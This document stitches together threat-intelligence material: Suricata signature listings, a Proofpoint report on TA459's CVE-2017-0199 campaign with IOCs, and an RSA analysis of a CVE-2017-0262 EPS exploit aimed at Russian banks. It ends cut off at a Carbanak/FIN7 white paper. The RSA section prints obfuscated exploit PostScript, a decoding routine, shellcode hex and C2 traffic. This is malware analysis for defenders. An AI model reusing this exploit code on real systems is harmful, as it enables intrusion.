2828927,ETPRO TROJAN PowerRatankba DNS Lookup 7
2828928,ETPRO TROJAN PowerRatankba DNS Lookup 8
2828929,ETPRO TROJAN PowerRatankba DNS Lookup 9
2828930,ETPRO TROJAN PowerRatankba DNS Lookup 10
2828931,ETPRO TROJAN PowerRatankba DNS Lookup 11
2828932,ETPRO TROJAN PowerRatankba DNS Lookup 12
2828933,ETPRO TROJAN PowerRatankba DNS Lookup 13
2828934,ETPRO TROJAN PowerRatankba DNS Lookup 14
2828935,ETPRO TROJAN PowerRatankba DNS Lookup 15
2828936,ETPRO TROJAN PowerRatankba DNS Lookup 16
2828937,ETPRO TROJAN PowerRatankba DNS Lookup 17
2828938,ETPRO TROJAN PowerRatankba DNS Lookup 18
2828939,ETPRO TROJAN PowerRatankba DNS Lookup 19
2828940,ETPRO TROJAN PowerRatankba DNS Lookup 20
2828941,ETPRO TROJAN PowerRatankba DNS Lookup 21
2828942,ETPRO TROJAN PowerRatankba DNS Lookup 22
2828943,ETPRO TROJAN PowerRatankba DNS Lookup 23
2828944,ETPRO TROJAN PowerRatankba DNS Lookup 24
2828945,ETPRO TROJAN PowerRatankba DNS Lookup 25
2828946,ETPRO TROJAN PowerRatankba DNS Lookup 26
2828947,ETPRO TROJAN PowerRatankba DNS Lookup 27
2828948,ETPRO TROJAN PowerRatankba DNS Lookup 28
2828949,ETPRO TROJAN PowerRatankba DNS Lookup 29
2828950,ETPRO TROJAN PowerRatankba DNS Lookup 30
2828951,ETPRO TROJAN PowerRatankba DNS Lookup 31
2828952,ETPRO TROJAN PowerRatankba DNS Lookup 32
2828953,ETPRO TROJAN PowerRatankba DNS Lookup 33
2828971,ETPRO TROJAN RatankbaPOS POS Exfiltration
North Korea Bitten by Bitcoin Bug
ABOUT PROOFPOINT
Proofpoint, Inc. (NASDAQ:PFPT), a next-generation cybersecurity company, enables organizations to protect the way their people
work today from advanced threats and compliance risks. Proofpoint helps cybersecurity professionals protect their users from
the advanced attacks that target them (via email, mobile apps, and social media), protect the critical information people create,
and equip their teams with the right intelligence and tools to respond quickly when things go wrong. Leading organizations of
all sizes, including over 50 percent o
f the Fortune 100, rely on Proofpoint solutions, which are built for today
s mobile and
social-enabled IT environments and leverage both the power of the cloud and a big-data-driven analytics platform to combat
modern advanced threats.
www.proofpoint.com
Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other
countries. All other trademarks contained herein are property of their respective owners.
APT Targets Financial Analysts with CVE-2017-0199
proofpoint.com /us/threat-insight/post/apt-targets-financial-analysts
On April 20, Proofpoint observed a targeted campaign focused on financial analysts working at top global financial
firms operating in Russia and neighboring countries. These analysts were linked by their coverage of the
telecommunications industry, making this targeting very similar to, and likely a continuation of, activity described in
our
In Pursuit of Optical Fibers and Troop Intel
blog. This time, however, attackers opportunistically used spearphishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the
ZeroT Trojan, which in turn downloaded the PlugX Remote Access Trojan (RAT).
Proofpoint is tracking this attacker, believed to operate out of China, as TA459. The actor typically targets Central
Asian countries, Russia, Belarus, Mongolia, and others. TA549 possesses a diverse malware arsenal including
PlugX, NetTraveler, and ZeroT. [1][2][3]
In this blog, we also document other 2017 activity so far by this attack group, including their distribution of ZeroT
malware and secondary payloads PCrat/Gh0st.
Analysis
In this campaign, attackers used a Microsoft Word document called 0721.doc, which exploits CVE-2017-0199. This
vulnerability was disclosed and patched days prior to this attack.
Figure 1: Microsoft Word document 0721.doc
The document uses the logic flaw to first download the file power.rtf from hxxp://122.9.52[.]215/news/power.rtf. The
payload is actually an HTML Application (HTA) file, not an RTF document.
Figure 2: The first script downloaded by the exploit document is an HTA file
As shown in the figure above, the HTA
s VBScript changes the window size and location and then uses PowerShell
to download yet another script: power.ps1. This is a PowerShell script that downloads and runs the ZeroT payload
cgi.exe.
Figure 3: The second script downloaded by the exploit document is a PowerShell script
Figure 4: Combined network traffic showing the document downloading its payloads
ZeroT and other payloads
The attack group has made incremental changes to ZeroT since our last analysis. While they still use RAR SFX
format for the initial payloads, ZeroT now uses a the legitimate McAfee utility (SHA256
3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe) named mcut.exe instead of the
Norman Safeground AS for sideloading as they have in the past. The encrypted ZeroT payload, named Mctl.mui, is
decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to
ZeroT payloads we analyzed previously.
Once ZeroT is running, we observed that the fake User-Agent used in the requests changed from
Mozilla/6.0
(compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)
to
Mozilla/6.0 (compatible; MSIE 11.0; Windows NT 6.2)
thus removing the
Tzcdrnt
typo observed in previous versions. The initial beacon to index.php changed to index.txt
but ZeroT still expects an RC4-encrypted response using a static key:
(*^GF(9042&*
Figure 5: ZeroT initial beacon over HTTP requesting URL configuration
Next, ZeroT uses HTTP beacons to transmit information about the infected system to the command and control
(C&C). All posts are encrypted, unlike the last time we analyzed a sample from this actor, when the first POST was
accidentally not encrypted. After that, stage 2 payloads are still retrieved as Bitmap (BMP) images that use Least
Significant Bit (LSB) Steganography to hide the real payloads. These images appear normal in image viewers.
Figure 6: Collage of example BMP images containing stage 2 payloads hidden using LSB steganography
The stage 2 payload was PlugX that beaconed to C&C servers www[.]icefirebest[.]com and www[.]icekkk[.]net.
Figure 7: ZeroT and PlugX HTTP network activity
Additional 2017 activity by TA459
Throughout 2017 we observed this threat actor actively attempting to compromise victims with various malware
payloads. ZeroT remained the primary stage 1 payload, but the stage 2 payloads varied. One such interesting
example was
.rar
(SHA256
b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda). Translated from Russian, this file is
named
PROJECT REALIZATION PLAN
and contains a compressed .scr executable. This ZeroT executable
communicated with the C&C domain www[.]kz-info[.]net and downloaded PlugX as well as an additional
PCRat/Gh0st Trojan which communicated with the www[.]ruvim[.]net C&C server. PCRat/Gh0st is a payload that we
do not see this group using frequently.
Another interesting ZeroT sample (SHA256
bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374) contained the executable
0228.exe and a decoy document 0228.doc in the RAR SFX archive. Bundling decoy documents is a common tactic
by this group. RAR SFX directives are used to display the decoy while the malicious payload is executed. We
suspect that this specific lure was copied from the news article hxxp://www.cis.minsk[.]by/news.php?id=7557. This
article was about
, translated from Russian as
73rd meeting of the
CIS Economic Council
, which describes a meeting held in Moscow by the Commonwealth of Independent States
(CIS) countries, an organization that includes nine out of the fifteen former Soviet Republics.
Figure 8: Decoy document
Figure 9: The believed source of the text in decoy document
Conclusion
TA459 is well-known for targeting organizations in Russia and neighboring countries. However, their strategy,
tactics, techniques, and procedures in this particular attack emphasize the importance of rigorous patching regimens
for all organizations. Even as software vulnerabilities often take a back seat to human exploits and social
engineering, robust defenses must include protection at the email gateway, proactive patch management, and
thoughtful end user education. Paying attention to the details of past attacks is also an important means of preparing
for future attacks. Noting who is targeted, with what malware, and with what types of lures provide clues with which
organizations can improve their security posture.
At the same time, multinational organizations like the financial services firms targeted here must be acutely aware of
the threats from state-sponsored actors working with sophisticated malware to compromise users and networks.
Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of
research and expertise further complicate an already difficult security situation for organizations dealing with more
traditional malware threats, phishing campaigns, and socially engineered threats every day.
References
[1]https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia
[3]https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests
[3]https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx
Indicators of Compromise (IOCs)
IOC Type
Description
a64ea888d412fd406392985358a489955b0f7b27da70ff604e827df86d2ca2aa
SHA256
0721.doc CVE2017-0199
hxxp://122.9.52[.]215/news/power.rtf
0721.doc payload
hxxp://122.9.52[.]215/news/power.ps1
0721.doc payload
hxxp://www.firesyst[.]net/info/net/sports/drag/cgi.exe
0721.doc payload
bf4b88e42a406aa83def0942207c8358efb880b18928e41d60a2dc59a59973ba
SHA256
ZeroT (cgi.exe)
www.firesyst[.]net
Hostname
ZeroT C&C
www.icekkk[.]net
Hostname
PlugX C&C
IOC Type
Description
www.kz-info[.]net
Hostname
ZeroT C&C
www.firesyst[.]net
Hostname
ZeroT C&C
www.buleray[.]net
Hostname
ZeroT C&C
www.intersu[.]net
Hostname
ZeroT C&C
868ee879ca843349bfa3d200f858654656ec3c8128113813cd7e481a37dcc61a
SHA256
ZeroT
Indicators of Compromise (IOCs) - Related
4601133e94c4bc74916a9d96a5bc27cc3125cdc0be7225b2c7d4047f8506b3aa
SHA256
ZeroT
5fd61793d498a395861fa263e4438183a3c4e6f1e4f098ac6e97c9d0911327bf
SHA256
ZeroT
b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda
SHA256
ZeroT
ab4cbfb1468dd6b0f09f6e74ac7f0d31a001d396d8d03f01bceb2e7c917cf565
SHA256
ZeroT
79bd109dc7c35f45b781978436a6c2b98a5df659d09dee658c2daa4f1984a04e
SHA256
ZeroT
www.icekkk[.]net
Hostname
PlugX C&C
www.icefirebest[.]com
Hostname
PlugX C&C
www.ruvim[.]net
Hostname
PlugX C&C
ET and ETPRO Suricata/Snort Coverage
2821028 | ETPRO TROJAN APT.ZeroT CnC Beacon HTTP POST
2825365 | ETPRO TROJAN APT.ZeroT CnC Beacon Fake User-Agent
2824641 | ETPRO TROJAN APT.ZeroT Receiving Config
2810326 | ETPRO TROJAN PlugX Related Checkin
2024196 | ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential Office Exploit Attempt
2024197 | ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in RTF 0-day )
2016922 | ET TROJAN Backdoor family PCRat/Gh0st CnC traffic
2021716 | ET TROJAN Backdoor family PCRat/Gh0st CnC traffic (OUTBOUND) 102
Russian Bank Offices Hit with Broad Phishing Wave
community.rsa.com /community/products/netwitness/blog/2017/08/17/russian-bank-offices-hit-with-broad-phishing-wave
By far most of the bank-related phishing campaigns described in security advisories and reports consist of bank customers being targeted for their online credentials. Much less common is
a phishing campaign targeting the banks themselves. Perhaps fraudsters know that there are a lot more bank customers than there are banks, and generally banks have a more
hardened security posture than the average bank
s customer.
Target: multiple bank offices in Russia
But still, payoff potential for a successful bank compromise might be considerable. In this threat advisory, we describe a Russian-language phishing campaign active during the second
week of August 2017, targeting not the usual banking customers, but the Russian banks themselves. And in an unusual reversal of typical bank phishing social engineering tactics, the
phishing emails purport to be from the bank
s customers. Consider the following phish delivered to the email address displayed on the bank
s website. In the email screenshot with our
added machine translation from Russian, notice the subject line and message body text reflecting a
business customer upset about extra charges on his credit card
social engineering
theme (Figure 1).
Figure 1 Phishing email targeting Russia bank #1, machine translation in red boxes
Figure 2 is a screenshot of another phishing email obtained by RSA FirstWatch, targeting
Russia bank #2.
While this email is part of the same campaign, note that the body text, subject
lines, file name, and @mail.com sender email is different from that targeting Russia bank #1, suggesting at least some manual actor modifications to the phishing email construction.
Figure 2 Phishing email targeting Russia bank #1, machine translation in red boxes
RSA FirstWatch identified 23 such attachments in this campaign, all using what appeared to be the exact same EPS exploit. The disgruntled banking customer was consistent throughout;
illustrated below are a few attachment examples:
Exploit attachment #1 was deployed with the following names in Russian:
.docx ("Account statement")
.docx ("Card statement")
.docx ("Personal information")
Exploit attachment #2 was deployed with the following names:
.docx (or
Card statement
.docx (or
Customer card statement
Exploit attachment #3 was deployed using the following name:
.docx (or
Statement
Note: Hashes of all samples will be included in the Appendix of this analysis.
As of 10 August 2017, RSA FirstWatch has high confidence that multiple individuals at many Russian banks were targeted with these malicious attachments, and believe this campaign
was subsequently brought to the attention of the Central Bank of Russia
s FinCERT by one or more of the banks being targeted. On 17 August 2017, the day we were finishing up this
analysis, a new sample was discovered being deployed, with a different C2 node and slightly different communication.
An exploit in someone else
s wrapper?
Before we get to details about the exploit used in this campaign, we should cover some history on EPS exploits in docx files. FireEye discovered a malicious docx exploiting a zero day
vulnerability in Microsoft
s Encapsulated Postscript (EPS) filter, in the summer of 2015. This EPS exploit was assigned CVE-2015-2545. In March 2017, FireEye observed both nation
state and financially motivated actors using EPS zero day exploits assigned as CVE-2017-0261 and CVE-2017-0262, prior to Microsoft disabling EPS rendering in its Office products with
an update in April 2017. So it is likely one of these three EPS exploits is being employed with the perpetrator activity under investigation, perhaps hoping that their targets haven
t applied
the April patch that would make every EPS exploit futile.
Since docx files are just a Zip-compressed container, comparing them with a file tree view might be a quick way to assess similarity on a high level. In fact, all 23 known docx files used in
this campaign are very nearly identical, with the same 12 component files. Varying checksums might have to do with build artifacts, perhaps even intentionally so, in order to generate a
unique hash with each build.
Figure 3 Tree view of docx container file used to target Russian banks last week
Interesting enough 10 of these 12 docx component files (everything but the image1.eps and document.xml files) are dated April 18 th. This is no coincidence; in fact, those same docx
component files were found in the attachment used by nation-state actors in their email targeting of an Eastern European Ministry of Foreign Affairs , back when this EPS exploit was still a
zero day (Figure 4).
Figure 4 Eastern European Ministry of Foreign Affairs targeted by suspected nation state actors
So if we compare the tree view of that older docx container (Figure 5), we see that 10 of the same component files appear identical, and we can confirm that using cryptographic hashing.
Figure 5 Tree view of "Trump" exploit docx container, with 10 of 12 files identical to 23 recent RU bank targeting samples described in this investigation
Of special note is the common app.xml file, which comes directly from the decoy document in the
Trump
exploit file. This app.xml file contains the same URL to the California Courier
website (www[.]thecaliforniacourier[.]com), where the text was copied from
Trump
s Attack on Syria: Wrong for so Many Reasons
as described by ESET in their exploit analysis .
Clearly there was some
borrowing
going on between this current bank-targeting campaign and the previous nation-state espionage campaign. Does this suggest that these campaigns
and actors are in any way complicit/related? No. On the contrary, national interests seem to imply that those particular espionage-focused actors (i.e., from the
Trump
campaign) would
almost certainly NOT be involved in broadly exploiting Russian banks a few months later. That being said, an alternative hypothesis is that these bank-targeting actors purposely
purloined the older espionage related docx files to introduce uncertainty and/or mis-attribution, or even to send a message to defenders or researchers. As we'll see shortly, the attackers
also interestingly signed (commented) their malware with lyrics from Slipknot's Snuff.
Figure 6 Google result with Slipknot Snuff lyrics
Which exploit is this?
Obfuscation is important for exploits, especially when a campaign that is broad as this one is up against a gamut of financial institutions with AV
s that have had plenty of time to add
detection for known EPS exploits. With initial AV coverage of these two dozen or so attachments in the single digits out of more than 50 AV vendors, RSA Engineering
s Kevin
Douglas jumped at the chance to flex his deobfuscation skills, and here steps us through our exploit assessment.
Step 1. Unzipping the sample DOCX file, reveals the following embedded EPS Image file
unzip ./2c86a55cefd05352793c603421b2d815f0e1ddf08e598e7a3f0f6b1d3928aca8
Archive: ./2c86a55cefd05352793c603421b2d815f0e1ddf08e598e7a3f0f6b1d3928aca8
inflating: [Content_Types].xml
inflating: docProps/app.xml
inflating: docProps/core.xml
inflating: word/document.xml
inflating: word/fontTable.xml
inflating: word/settings.xml
inflating: word/styles.xml
inflating: word/webSettings.xml
inflating: word/media/image1.eps
inflating: word/theme/theme1.xml
inflating: word/_rels/document.xml.rels
inflating: _rels/.rels
Step 2. Examining the app.xml file, we can see a suspicious URL artifact
cat docProps/app.xml
Normal.dotm 1 2
958 5462 Microsoft Office Word 0 45
12 false Title
1
false 6408 false
4456521 0 0 5
hXXp://www[.]thecaliforniacourier[.]com
false 15.0000
Step 3. Examining the image1.eps file, we can see:
1. A likely multibyte XOR key (<7a5d5e20>)
Quoting lyrics from Slipknot's Snuff in the comments (%%Myheartisjusttoodarktocare, %%Icantdestroywhatisntthere)
3. A likely XOR encoded hexadecimal payload (<017d71681f3128450e343d415a3b374e1e3b314e0e7d6f104a7d2d431b313b4615332a0009382a4615332a001d3131421b313a491
4. 9297e421f3a
5. A likely XOR decode loop: (0 1 A1 length 1 sub { /A5 exch def A1 A5 2 copy get A2 A5 4 mod get xor put } for A1 } )
6. A likely execution of the payload once it is decoded (exec )
7. Repetitive obfuscated comments translating to
kasper-pidor kasper-pidor kasper-pidor kasper-pidor
scattered throughout to make the code that make it harder to read. These
are highlighted in green... and possibly speak to something more personal between the actors and Kaspersky possibly?
(e.g., %%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220)
Dump of image1.EPS code:
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 31 24 51 654
%%Page: 1 1
/Times-Roman findfont globaldict
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
begin /l0 11 def l0 scalefont setfont newpath /E1 600 def 4 E1 moveto /l2 E1 def /l3 { /l4 exch def /l2 l2 l0 sub def 12 l2 moveto l4 show } /min { 2 copy gt { exch } if pop } bind def /max { 2
copy lt { exch } if pop } bind def
/A3{ token pop exch pop }
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
def /A2
%%6b61737065722d706
%%6b61737065722d706
<7a5d5e20> def /A4{
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
/A1 exch
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
def 0 1 A1 length 1 sub
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
{ /A5 exch def A1 A5 2 copy get A2 A5 4 mod get xor
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
put } for A1 }
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
def <017d71681f3128450e343d415a3b374e1e3b314e0e7d6f104a7d2d431b313b4615332a0009382a4615332a001d3131421b313a491
9297e421f3a374e5a721f11497d66104a6d6e105a393b465a721f11487d1f11497d6f165a343a490c7d6f001b393a001e383800551c660
0017d71614f697e45023e36001e383800551c6c165a382643127d3a451c7d7161496a7e61486b7e4c1f333954127d3a451c7d71614f6a7e
614f697e4c1f333954127d3a451c7d71614e6c7e124f6b7e441f3b7e0f3b6c6f003b6e69003b696f001339375[
]0077d7e00>
%% quit 6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%Myheartisjusttoodarktocare
%%Icantdestroywhatisntthere
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
A4 %%6b61737065722d7069646f72206b61
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
A3 %%6b61737065722d7069646f72206b61
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
exec %%6b61737065722d7069646f72206b61
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
%%6b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f72206b61737065722d7069646f7220
showpage quit
Step 4. Decoding the payload
Using the multibyte XOR Key (7a5d5e20), the payload can be decoded by XOR
ing each byte of the payload with its (position % 4) in the XOR key. For example, position 0 in the payload
is XOR
d against 0x7a, position 1 is XOR
d against 0x5d, position 2 is XOR
d against 0x5e, position 3 is XOR
d against 0x20. Then the cycle repeats for subsequent payload bytes.
Code similar to what's pasted below would decode it (acBuffer is payload, acKeys is XOR key).
for (int ctr = 0; ctr < sizeof(acPayload) - 1; ctr++) {
printf("%c", acPayload[ctr] ^ (acKeys[(ctr % 4)]));
This results in the decoded payload snippet pasted below. Highlighted is most likely an encoded payload used in the next stage. Also highlighted below are Windows DLL and function
artifacts indicating maliciousness.
{ /Helvetica findfont 100 scalefont setfont globaldict begin /A13 800000 def /A12 A13 16 idiv 1 add def /A8 { /A54 exch def /A26 exch def /A37 A26 length def /A57 A54 length def /A41 256
def /A11 A37 A41 idiv def { /A11 A11 1 sub def A11 0 lt{ exit } if A26 A11 A41 mul A54 putinterval } loop A26 } bind def /A61 { dup -16 bitshift /A43 exch def 65535 and /A34 exch def dup -16
bitshift /A22 exch def 65535 and dup /A63 exch def A34 sub 65535 and A22 A43 sub A63 A34 sub 0 lt { 1 } { 0 } ifelse sub 16 bitshift or } bind def /A60 { dup -16 bitshift /A43 exch def
65535 and /A34 exch def dup -16 bitshift /A22 exch def 65535 and dup /A59 exch def A34 add 65535 and A22 A43 add A59 A34 add -16 bitshift add 16 bitshift or } bind def /A17 { /A46
exch def A18 A46 get A18 A46 1 A60 get 8 bitshift A60 A18 A46 2 A60 get 16 bitshift A60 A18 A46 3 A60 get 24 bitshift A60 } bind def /A2 { /A45 exch def /A20 exch def A18 A20 A45 255
and put A18 A20 1 A60 A45 -8 bitshift 255 and put A18 A20 2 A60 A45 -16 bitshift 255 and put A18 A20 3 A60 A45 -24 bitshift 255 and put } bind def /A47 { A18 exch get } bind def /A29 {
2147418112 and /A56 exch def { A18 A56 get 77 eq { A18 A56 1 A60 get 90 eq { A56 60 A60 A17 dup 512 lt { A56 A60 dup A47 80 eq { 1 A60 A47 69 eq { exit } if } { pop } ifelse } { pop }
ifelse } if } if /A56 A56 65536 sub def } loop A56 } bind def /A51 { /A33 exch def /A38 exch def /A44 A38 dup 60 A60 A17 A60 def A18 A44 25 A60 get dup 01 eq { pop /A62 A38 A44 128
A60 A17 A60 def /A32 A44 132 A60 A17 def } { 02 eq { /A62 A38 A44 144 A60 A17 A60 def /A32 A44 148 A60 A17 def } if } ifelse 0 0 20 A32 1 A61 { /A49 exch def /A50 A62 A49 A60 12
A60 A17 def A50 0 eq { quit } if A18 A38 A50 A60 14 getinterval A33 search { length 0 eq { pop pop pop A62 A49 A60 exit } if pop } if pop } for } bind def /A40 { /A27 exch def /A23 exch def
/A53 A23 A27 A51 def A53 16 A60 A17 A23 A60 A17 A29 } bind def /A35 { /A42 exch def /A30 exch def /A58 exch def /A39 A58 A30 A51 def /A25 A39 A17 A58 A60 def /A21 0 def { /A24
A25 A21 A60 A17 def A24 0 eq { 0 exit } if A18 A58 A24 A60 50 getinterval A42 search { length 2 eq { pop pop A39 16 A60 A17 A58 A60 A21 A60 A17 exit } if pop } if pop /A21 A21 4 A60
def } loop } bind def /A31 589567 string
<00d0800d30d0800d000000000200000010d0800d020000003cd0800d0005000000000000000000005cd0800d00000300000000000000000020d0800d3cd0800d6cd0800d00000000f0ffff7f50d0800
A8 def 500 {A31 589567 string copy pop} repeat 1 array 226545696 forall /A19 exch def /A18 exch def /A16 A12 array def A19 1 A16 put /A9 226545696 56 add A17 A17 def A9 /A36 exch
A17 A29 def /A10 A36 4096 A60 def A9 /A68 exch 36 A60 A17 A17 40 A60 A17 def /A7 A18 A10 458752 getinterval def /A4 { /A64 exch def A7 A64 search { length A10 A60 exch pop exch
pop } { quit } ifelse } bind def /A1 { A7 <50 45> search { length A10 A60 exch pop exch pop } { quit } ifelse } bind def /A28 A36 (KERNEL32.dll) A40 def /A3 A18 A28 4096 getinterval def /A1 {
A3 <50 45> search { length A28 A60 exch pop exch pop } { quit } ifelse } bind def /A15 { A1 64 A60 A17 255 and } bind def A15 6 ne { quit } if /A14 A28 (ntdll.dll) (NtProtectVirtualMemory)
A35 def /A67 <94 c3> A4 def /A65 A67 1 A60 def /A66 A4 def /A55 A68 65536 A60 def /A52 A55 256 A60 def /A48 A55 512 A60 def /A6 A48 def A52 A68 A2 A52 4 A60 A13 A2
A16 0 A55 put A55 A55 4 A60 A2 A55 4 A60 A66 A2 A55 8 A60 A65 A2 A55 20 A60 A67 A2 A55 24 A60 A14 A2 A55 28 A60 A48 A2 A55 32 A60 -1 A2 A55 36 A60 A52 A2 A55 40 A60 A52
4 A60 A2 A55 44 A60 64 A2 A55 48 A60 A52 8 A60 A2 A68 2304 A2 /A5 A16 def A18 A6
<558bec83ec3053e8a40200008945fc8b45fc83c030508b4dfc83c11851e80e05000083c40450e81504000083c4088b55fc8982a80000008b45fc83c048508b4dfc83c11851e8e604000083c40450e8ed0
fd1a498994b7304ea2bf01272c6cc14b66ade7023b2fd8915d1bc7ac4b32bb89803b92980d328ec43b434d1f0620d5249e9eda8b50f1acfd50804566981d4af2b10c79acfa503e83f66c4b8b87e95748bb
putinterval A5 0 get bytesavailable }
Of particular in this last snippet is the block with the
forall
which is the memory corruption routine unique to the known exploit code for CVE-2017-0262, and as described in ESETs
analysis on the subject. With bit-for-bit copy of CVE-2017-0262 exploit code, we have reasonable confidence that the exploit we are dealing with is in fact CVE-2017-0262.
Step 5. Second stage payload
The second-stage payload (<558bec83ec3053e8a40200008945fc8b45fc83c030508b4dfc8
) appears to be a simple hex-encoded blob (no XOR decoding needed). Converting it from
hex to binary and running the UNIX strings command on it yields the following interesting artifacts that hint what the next stage will be
QSVW
ntdll.dll
kernel32.dll
LoadLibraryA
GetProcAddress
NtAllocateVirtualMemory
NtProtectVirtualMemory
GetCurrentProcess
QSVW
fff^
HJON
r|kw
ijxip7}uu
Uvx}Up{kxk`X
^|mIkvzX}}k|
pm|_pu|
KmuPwpmLwpzv}|Jmkpw~
^|m\wopkvwt|wmOxkpx{
Mqk|x}
^|mIkvz|jjPtx~|_pu|Wxt|X
Nkpm
8Mqpj9ikv~kxt9z-wwvm9{|9klw9pw9])J9tv}|
,Kpzqg
7m|am
Y7}xmx
7kjkz
jZp'
!zjt
Command and Control
The malware performs calls back to 137.74.224[.]142, at five second intervals (Figure 6).
Figure 6 Malware C2 in Wireshark, courtesy VXStream
The destination hosts offers an HTTP 200 response and
false
GET /z/get.php?name=c3857e72 HTTP/1.1
Host: 137.74.224.142
HTTP/1.1 200 OK
Date: Thu, 10 Aug 2017 06:59:01 GMT
Server: Apache/2.4.10 (Debian)
Content-Length: 5
Content-Type: text/html; charset=UTF-8
False
We believe that the actors would not invoke remote control unless they had ruled out nosy researchers. Based on Google searches identifying the C2 IP address ( 137.74.224[.]142) as an
established Minecraft (multiplayer game) server, we suspect it is possible that the host has been compromised by the perpetrators and is being used without the permission of the owner.
Other previous URL resolutions may be associated with prior customers of the virtual private server (Figure 7).
Figure 7 Historic DNS resolutions for C2 IP address, courtesy PassiveTotal
During the course of this research we found some similarities in look and feel of this campaign (and its potential attribution) with past FirstWatch posts in Attacking a POS Supply Chain
part-1 and CHTHONIC and DIMNIE Campaign Targets Russia 8-2-2017.
Thanks to Kent Backman, Kevin.Douglas2@rsa.com, and Christopher Elisan for all their contributions to this research.
Appendix
Md5 hashes of EPS exploit docx with C2 of 137.74.224[.]142
0c718531890dc54ad68ee33ed349b839
9c7e70f0369215004403b1b289111099
e589ae71722ac452a7b6dd657f31c060
68e190efe7a5c6f1b88f866fc1dc5b88
630db8d3e0cb939508910bd5c93e09fe
c43f1716d6dbb243f0b8cd92944a04bd
df0f8fb172ee663f6f190b0b01acb7bf
ed74331131da5ac4e8b8a1c818373031
e8ea2ce5050b5c038e3de727e266705c
5df8067a6fcb6c45c3b5c14adb944806
104913aa3bd6d06677c622dfd45b6c6d
00b470090cc3cdb30128c9460d9441f8
f8ce877622f7675c12cda38389511f57
7c80fb8ba6cf094e709b2d9010f972ba
cfc0b41a7cde01333f10d48e9997d293
69de4a5060671ce36d4b6cdb7ca750ce
18c29bc2bd0c8baa9ea7399c5822e9f2
3be61ecba597022dc2dbec4efeb57608
b57dff91eeb527d9b858fcec2fa5c27c
1bb8eec542cfafcb131cda4ace4b7584
4c1bc95dd648d9b4d1363da2bad0e172
d9a5834bde6e65065dc82b36ead45ca5
7743e239c6e4b3912c5ccba04b7a287c
MD5 hash of EPS exploit with C2 of 158.69.218[.]119
57f51443a8d6b8882b0c6afbd368e40e
WHITE PAPER
THE CARBANAK/FIN7
SYNDICATE
A HISTORICAL OVERVIEW OF AN
EVOLVING THREAT
WHITE PAPER
CONTENT
1. Executive Summary.....................................................................................................
2. The Digital Arsenal.....................................................................................................
2.1. Overview.............................................................................................................
2.1.1. Anunak/Sekur............................................................................................................
2.1.2. Carberp......................................................................................................................
2.1.3. Other Windows Trojans.......................................................................................
2.1.4. Linux and Other Tools..........................................................................................
3. Anunak Historical Overview..................................................................................
4. Overlap with Common Crimeware Campaigns................................................
5. Current Activity.........................................................................................................
6. Recommendations....................................................................................................
7. Conclusions.................................................................................................................
Appendix..........................................................................................................................
WHITE PAPER
1. EXECUTIVE SUMMARY
cate
noun
/'sin-di-k
